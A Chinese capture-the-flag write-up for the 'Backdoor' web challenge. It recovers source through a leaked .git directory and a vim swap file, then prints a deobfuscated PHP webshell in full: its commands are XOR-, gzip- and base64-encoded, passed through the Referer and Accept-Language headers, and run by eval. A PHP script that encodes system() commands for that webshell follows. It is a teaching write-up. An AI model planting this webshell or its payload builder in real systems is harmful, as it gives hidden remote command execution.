i春秋 “百度杯”CTF比赛 十月场 web题 Backdoor

0x00:

打开题目,题目中告诉我们这题是文件泄露。

0x01:

通过扫描目录,发现可以扫到的有3个文件

index.php 
flag.php
robots.txt

但是浏览flag.php它告诉我们这不是真正的flag

又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。

我们浏览这个url

http://6094ef7a9cad4288a4748de8ff8ffc573453e961300f46ce.game.ichunqiu.com/Challenges/.git/

注意到这里返回的是403(请求被拒绝),而不是404(访问无效)。那么这里就可以利用git泄露的脚本下载下来源文件。

这里使用的是rip-git.pl这个脚本,github地址:https://github.com/kost/dvcs-ripper

注:这里用rip-git.pl下载下来的文件是可以查看它上传github的历史记录的。而Githack这个工具虽然能下载文件,但是不能查看历史记录

查看flag.php

查看flag.php的日志

git log flag.php

可以看到他修改了很多次flag.php这个文件,我们回查一下上一次的修改时的内容

git diff 12c6ddf4af0a5542c1cf6a9ab19b4231c1fd9a88 flag.php

commit的值是test那次的值,可以看到在修改前是flag{true_flag_is_in_the_b4cko0r.php}

 

0x02:

 上面那个flag还不是真正的flag,于是我们访问flag提示的文件

http://6094ef7a9cad4288a4748de8ff8ffc573453e961300f46ce.game.ichunqiu.com/Challenges/b4ckdo0r.php

得到下面信息,查看源码也啥都没有:

最后测出来是.swo文件备份,我们把备份下载下来

因为打开是乱码,我把它在下载好后,拖到我的kali虚拟机的桌面上,然后用vim打开备份文件的方式打开

vim -r .b4ckdo0r.php.swo

因为为了研究这个代码,又没法更改备份文件,我们用vim的复制功能把这里面的内容复制到一个新的php文件里面,然后放回我的windows下(因为我很喜欢用windows)

这个代码是混淆过的,但主要看$y和$L和$v这3个变量,分别对应的是

$y = create_function  //这里去掉了字符串中的字母b

$L = 把上面的如 $c, $f等字符串变量中的“)m“给去掉

$v = create_function('', $L); 这里是生成一个不带参数的匿名函数,函数内容就是$L的内容。

然后运行$v()函数

根据这个逻辑解开混淆后$L的内容:

把内容打印到我们本地搭建的服务器上,然后查看源码,并整理下就是b4ckdo0r.php源码内容

注意:这里一定要看源码,因为中间有一部分"<"被当做html的标签了,没法完整显示

web本来的页面这里的代码很奇怪

查看源码发现原因,是因为<被当做标签起始了

 整理后源码如下:

<?php 
$kh="4f7f"; 
$kf="28d7"; 
function x($t,$k) { 
    $c=strlen($k); 
    $l=strlen($t); 
    $o=""; 
    for($i=0; $i<$l;) { 
        for($j=0; ($j<$c&&$i<$l); $j++,$i++) { 
            $o.=$t{$i}^$k{$j}; 
        } 
    } 
    return $o; 
}
$r=$_SERVER; 
$rr=@$r["HTTP_REFERER"]; 
$ra=@$r["HTTP_ACCEPT_LANGUAGE"]; 
if($rr&&$ra) { 
    $u=parse_url($rr); 
    parse_str($u["query"],$q); 
    $q=array_values($q); 
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m); 
    if($q&&$m) { 
        @session_start(); 
        $s=&$_SESSION; 
        $ss="substr"; 
        $sl="strtolower"; 
        $i=$m[1][0].$m[1][1]; 
        $h=$sl($ss(md5($i.$kh),0,3)); 
        $f=$sl($ss(md5($i.$kf),0,3)); 
        $p=""; 
        for($z=1; $z<count($m[1]); $z++)
            $p.=$q[$m[2][$z]]; 
        if(strpos($p,$h)===0) { 
            $s[$i]=""; $p=$ss($p,3); 
        } 
        if(array_key_exists($i,$s)) { 
            $s[$i].=$p; 
            $e=strpos($s[$i],$f); 
            if($e) { 
                $k=$kh.$kf; 
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k))); 
                $o=ob_get_contents(); 
                ob_end_clean(); 
                $d=base64_encode(x(gzcompress($o),$k)); print("<$k>$d</$k>"); 
                @session_destroy(); 
            } 
        } 
    } 
}

解释一下这里的代码(因为我比较菜,通过每一步把变量输出,最后弄清楚搞了3个小时左右)

x($t, $k)函数是个异或函数,第一个参数和第二个参数按位对应异或,如果第二个参数全部异或了一遍,第一个还没结束,又从第二个参数头部从头开始。

$rr是通过http报头的Referer参数传入,我们可控

$rs是通过http报头的accept-language参数传入,我们可控

这里先介绍下accpet-language吧,举个栗子

这里的zh-CN是默认语言,之后每个值以“,(逗号)”隔开,格式为“ 语言;q=权重 ”

那么preg_match_all这个正则所做的事,看着很复杂,我们直接把他输出到自己服务器的web上吧

是一个二维数组,然后$i会取[1][0]和[1][1]的组合值

$h和f分别是 ($i . $kh)和($i . $kf)的md5值的前3个字符这里算出来是675和a3e

这一段代码会看language的语言有多少个,然后$p是以权重的小数部分值为下标,然后取Referer的url中的对应下标的参数的值的组合

这里举个例子,a=1中的1 就是$q[$m[2][0]],b=2中的2 就是$q[$m[2][1]]

然后就是判断$p这个变量前3个是不是675,后3个是不是a3e,最后我们的构造为 "675 + payload + a3e"

然后就是传到eval函数里面了,这里我们要通过eval函数来读目录,然后查看flag

eval中用了很多编码方式,也用到了自定的x($t, $k)这个异或函数,我们依次测试下顺序,就能正确的生成我们的payload,来构造system("ls");

这里异或的规律

a = b ^ c那么 b = a ^ c;这是一个很简单的规律,所以x函数即使编码函数,也是解码函数

最后附上我生成payload和解码返回值的内容的php代码

<?php

function x($t,$k) { 
    $c=strlen($k); 
    $l=strlen($t); 
    $o=""; 
    for($i=0; $i<$l;) {
        for($j=0; ($j<$c&&$i<$l); $j++,$i++) { 
            $o.= $t{$i} ^ $k{$j}; 
        } 
    } 
    return $o; 
}

function get_answer($str){
    $str = base64_decode($str);
    $str = x($str, '4f7f28d7');
    $str = gzuncompress($str);
    echo $str . "<br>";
}

function input($cmd){
    $str = 'system("' . $cmd . '");';
    $t1 = gzcompress($str);
    echo '$t1 = ' . $t1 . "<br>";
    $t2 = x($t1, '4f7f28d7');
    echo '$t2 = ' . $t2 . "<br>";
    $t3 = base64_encode($t2);
    echo '$t3 = ' . $t3 . "<br>";
    return $t3;
}

$ra='zh-CN,zh;q=0.0';
input('ls');
//get_answer('');

?>

把命令输入input里面,运行这个php脚本就会生成ls命令的payload,而我们accep-language所填内容为 'zh-CN,zh;q=0.0'

 

 于是我们第一次的payload为:

将返回内容填到我们的脚本中,生成解码后的内容

然后生成cat this_i5_flag.php的payload,最后flag在源码中

注:这里我审计代码的时候是采用比较笨的方法,因为源码我们下载了下来,那么我么就可以任意修改,我是把每个地方有值的变化,就直接输出出来,方便更加透彻的理解流程。

posted @ 2018-10-21 23:55  sijidou  阅读(4588)  评论(0编辑  收藏  举报